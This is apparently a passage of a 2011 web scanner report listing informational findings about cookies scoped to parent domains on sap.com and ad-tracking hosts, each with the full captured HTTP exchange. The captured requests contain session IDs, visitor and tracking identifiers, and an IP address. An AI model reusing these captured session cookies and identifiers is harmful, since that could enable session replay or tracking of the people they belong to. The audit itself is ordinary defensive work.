'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=v
...[SNIP]...
11.8. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e99a41848264554&sscs_active=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://s7.addthis.com/static/r07/sh62.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: segment-pixel.invitemedia.com
Proxy-Connection: Keep-Alive
Cookie: segments_p1="eJzjYuY4y8nFzPFejYuT40G4wM3by76yAPknOYDEZykuFo6N61mA5JEXjAD+JAwQ"; exchange_uid="eyI0IjogWyJDQUVTRUU0N0p5cG5jS2FHVzQzQnVoNlVleTQiLCA3MzQ0MTJdfQ=="; uid=b670d1b3-6ae0-4f57-baa7-b088401da6c3; partnerUID="eyI3OSI6IFsiMjdhM2YxMzlkOGZlMmI2MzdmNDY4NDdlMDkyNTdjYWIiLCB0cnVlXX0="; uid=0fd02718-925d-426f-97b4-9ed3e53d1800

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 15 Oct 2011 15:28:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 15-Oct-2011 15:27:56 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlOTlhNDE4NDgyNjQ1NTQiLCB0cnVlXSwgIjc5IjogWyIyN2EzZjEzOWQ4ZmUyYjYzN2Y0Njg0N2UwOTI1N2NhYiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sun, 14-Oct-2012 15:28:16 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
11.9. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=559f7m7161&tz=5&ref=http%3A%2F%2Fwww.newsgator.com%2FDefault.aspx%3Ftabid%3D214&page=http%3A%2F%2Finfo.newsgator.com%2FTrial_SocialSites2010.html%3FLeadsource%3Dtrial&uuid=F4143347-478D-456F-9FDA-2CD5D97335AB&rnd=1601796576 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://info.newsgator.com/Trial_SocialSites2010.html?Leadsource=trial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Sat, 15 Oct 2011 15:26:12 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Sun, 14-Oct-2012 15:26:12 GMT; Path=/

GIF89a.............,...........D..;
11.10. https://training.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://training.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:58:52 GMT
Server: Apache
Set-Cookie: ecomssid=fvscn6jrn5dm1p8m0c17ts0du0; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=3f868610-479e-adc4-fdf5-6eba419da7ce; expires=Sun, 14-Oct-2012 14:58:52 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; expires=Mon, 14-Oct-2013 14:58:52 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=CA; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Location: /ca/en/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

11.11. http://www.sap.com/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /Tracking.epi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 214
Origin: http://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

{"method":"TrackEventInteraction","arguments":["http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy","","CLICK","Shop the Business Center","http://store.sap.com/","","ClickArea=CTA","
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:46 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:46 GMT

11.12. http://www.sap.com/about-sap/company/legal/privacy.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:42 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:42 GMT
Content-Length: 22056


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...
11.13. http://www.sap.com/about-sap/events/worldtour/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/events/worldtour/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:57 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.14. http://www.sap.com/asset/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /asset/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asset/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18873
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:58 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:58 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.15. http://www.sap.com/buy-now/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /buy-now/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-now/index.epx?class=utilitynav-buy&_=1318689048629 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690909|check#true#1318689109

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:37 GMT
Content-Length: 9958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.16. http://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 251
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:09 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&
...[SNIP]...
11.17. http://www.sap.com/common/formAbandonWarning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /common/formAbandonWarning.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/formAbandonWarning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.18. http://www.sap.com/country-selector.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /country-selector.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /country-selector.epx HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Content-Length: 16973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.19. http://www.sap.com/customer-showcase/growth/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/growth/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/growth/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
